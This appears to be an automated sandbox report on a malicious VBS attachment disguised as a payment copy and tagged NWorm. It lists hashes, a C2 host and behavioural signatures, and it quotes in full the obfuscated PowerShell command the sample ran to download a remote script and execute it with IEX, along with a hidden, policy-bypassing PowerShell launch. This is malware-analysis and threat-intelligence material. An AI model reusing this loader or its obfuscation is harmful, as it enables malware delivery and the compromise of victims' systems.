Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
09-03-2022 14:58
Static task
static1
Behavioral task
behavioral1
Sample
KVDKGYBAXAKQX_PAYMENT_COPY.vbs
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
KVDKGYBAXAKQX_PAYMENT_COPY.vbs
Resource
win10v2004-en-20220113
General
-
Target
KVDKGYBAXAKQX_PAYMENT_COPY.vbs
-
Size
9KB
-
MD5
8ade0a04317db340d7dcdc9a4b32c795
-
SHA1
30350a6e2339507039e86a68a99958b1d9dea157
-
SHA256
1aa032a3d316f19de0c0946185eb7331aa1270d52882550c867eae1ce540ade1
-
SHA512
7572ebc9ae53a8639285b849fa972d4f40eaf3a923e43430f85337a73810bdeb487d0231ffdb4f0391442c2acdb244ab03063ed0ddc78cd12248431476c2cdaf
Malware Config
Extracted
https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt
Extracted
nworm
v0.3.8
nyanwmoney.duckdns.org:8891
594274bc
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4180 3488 POWERSHELL.exe -
Blocklisted process makes network request 1 IoCs
Processes:
POWERSHELL.exeflow pid process 5 4180 POWERSHELL.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 444 set thread context of 1300 444 powershell.exe aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
POWERSHELL.exepowershell.exepid process 4180 POWERSHELL.exe 4180 POWERSHELL.exe 444 powershell.exe 444 powershell.exe 444 powershell.exe 444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
POWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 4180 POWERSHELL.exe Token: SeDebugPrivilege 444 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
POWERSHELL.exepowershell.exedescription pid process target process PID 4180 wrote to memory of 444 4180 POWERSHELL.exe powershell.exe PID 4180 wrote to memory of 444 4180 POWERSHELL.exe powershell.exe PID 444 wrote to memory of 4876 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 4876 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 4876 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe PID 444 wrote to memory of 1300 444 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KVDKGYBAXAKQX_PAYMENT_COPY.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $Hx = 'https://transfer.sh/get/gnXbHK/ServerSHJWIJW8292.txt';$HB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{o\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{a\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{d\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25s9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25t9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25r9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25i9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25n9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25g9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25'.Replace('9$6%(_209}!#/[!+{/25&&27176=/]/76/=1=+-6+0%1_8+*#\4=7/9=#<%#%0@#]57140/36]$731*{^)!1-718_<)-8@+#/25',''),'&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9D&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9o&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9w&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9n&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9'.Replace('&1+$3/2&0^3_@#+][<!__4<!4+7[}6282]2-}682=++=(!8!*%[#(@%#2!!#-6+4%})^@\3_-9/<#8={$[0@!)__#)=%[}0&<(9',''));$HBB=('{2}{0}{1}' -f'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{b\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{C\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{l\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{i\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{e\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{n\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''),'\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{Ne\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{t\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{.W\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{'.Replace('\##)]74/5_472\8}3{_()8+&{09}39^}0}0@8(7[<5</&!@4%8&]3%}_+[}(/0]]59]7)[*^*{)%9=1%\6@}=)-[<)_#-)\+83{',''));$GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY=('{2}{0}{1}' -f'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9w-O{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9b{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9j{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9e{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9c{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9t ${=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9BB{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9).$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9B({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9$H{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9x){=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''),'{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9I{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`E{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9`X({=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9Ne{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9'.Replace('{=-<)@6_0#%1{(*/]]0-}5/3=6)}\<$1}</2+]_16/!8/)/[0[$__}%)-_8%-!-!<%6}_^9<70([}+548-&2&{!1&001_79}7<9',''));$HBBBBB = ($GSUAKNINNSESVPWHEQDXGURPSZLTOWJENLREXSBRNWNLWJBZJXDWWSWOHCQSHEDVYNSJYNALEJCJUSOTCFSJPKQUOZHBDYGCLWY -Join '')|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps12⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1MD5
96cbd4ee164e4feb93152e2ef2d0e229
SHA12f5963d3042b87d5e3684a8c1de74e3543aad81e
SHA2562926650956ac94279c598ba4b761eac9fa34e49e8fe19580adf8c62fd2fac15a
SHA51248df582b45e09a85e94d60502a1d5f68412ea1325d81ceb2256c5a142d09f4db57e2e6f746a55458276aa8d3d9af59ce66219489d9aa9b73c5dac2c8a7d27b5b
-
memory/444-139-0x00000238EE576000-0x00000238EE578000-memory.dmpFilesize
8KB
-
memory/444-135-0x00007FFF89F30000-0x00007FFF8A9F1000-memory.dmpFilesize
10.8MB
-
memory/444-137-0x00000238EE570000-0x00000238EE572000-memory.dmpFilesize
8KB
-
memory/444-136-0x00000238EE573000-0x00000238EE575000-memory.dmpFilesize
8KB
-
memory/444-140-0x00000238F09D0000-0x00000238F09EA000-memory.dmpFilesize
104KB
-
memory/1300-141-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/1300-142-0x00000000746F0000-0x0000000074EA0000-memory.dmpFilesize
7.7MB
-
memory/1300-143-0x0000000005990000-0x0000000005991000-memory.dmpFilesize
4KB
-
memory/4180-132-0x0000026C0C3A0000-0x0000026C0C3A2000-memory.dmpFilesize
8KB
-
memory/4180-133-0x0000026C0C3A3000-0x0000026C0C3A5000-memory.dmpFilesize
8KB
-
memory/4180-134-0x0000026C0C3A6000-0x0000026C0C3A8000-memory.dmpFilesize
8KB
-
memory/4180-131-0x00007FFF89F30000-0x00007FFF8A9F1000-memory.dmpFilesize
10.8MB
-
memory/4180-130-0x0000026C0C470000-0x0000026C0C492000-memory.dmpFilesize
136KB